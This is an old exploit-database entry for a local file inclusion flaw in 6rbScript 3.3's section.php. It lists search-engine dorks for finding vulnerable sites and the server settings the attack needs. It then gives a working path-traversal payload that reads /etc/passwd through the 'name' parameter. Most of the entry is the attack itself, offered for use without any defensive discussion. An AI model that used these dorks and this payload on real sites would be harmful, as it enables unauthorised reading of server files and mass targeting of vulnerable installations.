6rbScript 3.3 - 'section.php' Local File Inclusion
Exploit Author: Stack Analysis Author: www.bubbleslearn.ir Category: WebApps Language: PHP Published Date: 2008-09-21
|___________________________________________________|
|
| 6rbScript V3.3 Local file Vulnerability
|
|___________________________________________________
| |
|
| script : www.6rbscript.com
|
| DorK : inurl:"section.php?name=singers"
| dorK : Powered By 6rbScript V3.3
|___________________________________________________|
Author : Stack
Expl need magic quote = off & open basdir = off in many server
site.il/section.php?name=../../../../etc/passwd
# milw0rm.com [2008-09-21]